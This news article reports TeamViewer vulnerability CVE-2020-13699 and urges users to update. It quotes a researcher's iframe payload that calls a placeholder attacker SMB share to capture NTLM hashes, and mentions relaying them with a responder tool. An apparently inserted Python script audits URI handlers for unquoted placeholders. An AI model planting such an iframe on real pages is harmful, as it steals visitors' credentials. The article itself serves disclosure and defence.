Posted on August 11, 2020 at 3:44 PM
Security researchers have warned that there is a vulnerability in TeamViewer that could allow hackers to remotely steal system passwords. Users have been advised to run the latest version of the remote desktop software for Windows to prevent attacks on their systems.
The TeamViewer team recently released an update of its software so that users can move to the latest version and stay protected. The update includes a patch for a severe vulnerability (CVE-2020-13699) which, if exploited, could allow attackers to steal system passwords and compromise the affected systems.
However, the most worrying thing is that anyone who intends to exploit the vulnerability can execute the attack almost automatically, without any real interaction with the victims. They only need to convince them to visit a malicious webpage to set up the attack.
For those who don’t know, TeamViewer is a widely known remote-support software that enables users to share their desktop remotely and take complete control of another PC from anywhere in the world.
The software is available for mobile and desktop operating systems, including Blackberry, Windows Phone 8, Android, iOS, Chrome OS, Linux, macOS, as well as Windows.
The vulnerability allows the relay of NTLM authentication requests
The vulnerability was discovered by Jeffrey Hofmann of Praetorian. As he reported, the high-risk vulnerability lies in the way the platform quotes its custom URI handlers. It may enable attackers to force the software to relay an NTLM authentication request to the hacker’s system.
“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'),” Hofmann explained.
He further pointed out that Windows will carry out NTLM authentication when opening the SMB share, and that the request can be relayed with a responder tool for code execution.
The vulnerability impacts the TeamViewer versions from version 8 to version 15 for the Windows platform.
Put simply, an attacker can take advantage of TeamViewer’s URI scheme through a webpage to trick the application installed on the target system into setting up a connection to a remote SMB share owned by the attackers.
This triggers an SMB authentication attack, leaking the username and the hashed version of the password of the victim’s system to the attackers. They can then use the stolen details to access the victim’s computer or network resources.
To exploit the vulnerability successfully, the hacker needs to embed a malicious iframe in a webpage and lure victims to visit the page. Once the victim opens the malicious webpage, it automatically launches the Windows desktop client and opens a remote SMB share.
When the SMB share is opened, the victim’s Windows operating system performs NTLM authentication, and that request can be captured or relayed with a responder tool.
The vulnerability is known as an “Unquoted URI handler”, and it impacts the URI handlers teamviewer10, tvvpn1, tvvideocall1, tvsqsupport1, tvsqcustomer1, and tvsendfile1. The TeamViewer project has patched the vulnerability by quoting the parameters passed by the affected URI handlers.
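The root cause described above (an unquoted %1 placeholder in a URI handler's command template lets spaces in the URI become extra arguments) and the fix (quoting the placeholder) can be checked with a small audit script. The following is an added example, not code from TeamViewer or from the advisory: the scheme names are the ones listed in the article, while the executable paths, the placeholder host name and the helper names (placeholder_is_quoted, split_windows_args, arguments_seen_by_handler, audit) are assumptions made for illustration. On a real Windows host a practitioner would feed it the command values read from HKEY_CLASSES_ROOT\<scheme>\shell\open\command; here the templates are constructed inline so it runs anywhere.

```python
"""Audit helper for Windows URI (protocol) handler command templates.

Added example for CVE-2020-13699, not TeamViewer's code. Windows stores a protocol
handler as a command template (registry value under
HKEY_CLASSES_ROOT\\<scheme>\\shell\\open\\command) in which %1 stands for the full URI.
If %1 is not wrapped in double quotes, spaces inside the URI are split into separate
arguments by the launched program: the "unquoted URI handler" weakness the advisory
describes. The paths below are constructed placeholders, not real registry contents.
"""
import re

# Constructed sample templates: scheme names from the advisory, placeholder paths.
SAMPLE_HANDLERS = {
    "teamviewer10": r'"C:\Placeholder\TeamViewer.exe" %1',    # vulnerable form: %1 bare
    "tvvpn1":       r'C:\Placeholder\TeamViewer.exe %1',      # vulnerable form: nothing quoted
    "tvsendfile1":  r'"C:\Placeholder\TeamViewer.exe" "%1"',  # patched form: %1 quoted
}

_PLACEHOLDER_RE = re.compile(r'"%1"|%1')


def placeholder_is_quoted(template):
    """True if every %1 in the template is wrapped in double quotes, False if any
    occurrence is bare, None if the template contains no %1 at all."""
    found = _PLACEHOLDER_RE.findall(template)
    if not found:
        return None
    return all(tok == '"%1"' for tok in found)


def split_windows_args(command_line):
    """Simplified model of how a Windows program splits its command line: whitespace
    separates arguments unless it sits inside double quotes, and the quotes themselves
    are removed. (The real CommandLineToArgvW also has backslash-escape rules, which
    this illustration does not need.)"""
    args, current, in_quotes, have_token = [], [], False, False
    for ch in command_line:
        if ch == '"':
            in_quotes = not in_quotes
            have_token = True
        elif ch in " \t" and not in_quotes:
            if have_token:
                args.append("".join(current))
                current, have_token = [], False
        else:
            current.append(ch)
            have_token = True
    if have_token:
        args.append("".join(current))
    return args


def arguments_seen_by_handler(template, uri):
    """Substitute the URI into the template and return the argument list the handler
    program would receive (argv[0] is the executable)."""
    return split_windows_args(template.replace("%1", uri))


def audit(handlers):
    """Return the names of handlers whose %1 placeholder is not quoted."""
    return sorted(name for name, tpl in handlers.items()
                  if placeholder_is_quoted(tpl) is False)


if __name__ == "__main__":
    # A URI carrying spaces, shaped like the one quoted in the article; placeholder host.
    uri = r"teamviewer10: --play \\placeholder-host\share\fake.tvs"
    for name, tpl in SAMPLE_HANDLERS.items():
        state = "quoted" if placeholder_is_quoted(tpl) else "UNQUOTED"
        print(f"{name:13} {state:9} -> {arguments_seen_by_handler(tpl, uri)}")
    print("handlers needing a quoted %1:", audit(SAMPLE_HANDLERS))
```

With the unquoted templates the URI arrives at the program as three separate arguments (`teamviewer10:`, `--play` and the UNC path), so the program treats the second and third as options it was never meant to receive; with the patched template the whole URI is one argument. The same check applies to any application that registers its own URI scheme, not only TeamViewer.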
Users are advised to upgrade their systems
For now, there are no reports of hackers exploiting the vulnerability in the wild. However, given the popularity of the TeamViewer software, it may not take long before some hackers start exploiting it. Millions of users currently use the TeamViewer app, and that massive user base is enough to attract hackers’ interest.
Users are advised to update the software to version 15.8.3 because hackers may soon take an interest in the vulnerability and decide to exploit it. Security experts are advising that users of the software should upgrade their systems or face the likelihood of an attack on their Windows PCs. This is not the first SMB-authentication attack in recent times: similar attacks were previously disclosed in the Signal messenger, the Zoom video conferencing software, and Google Chrome.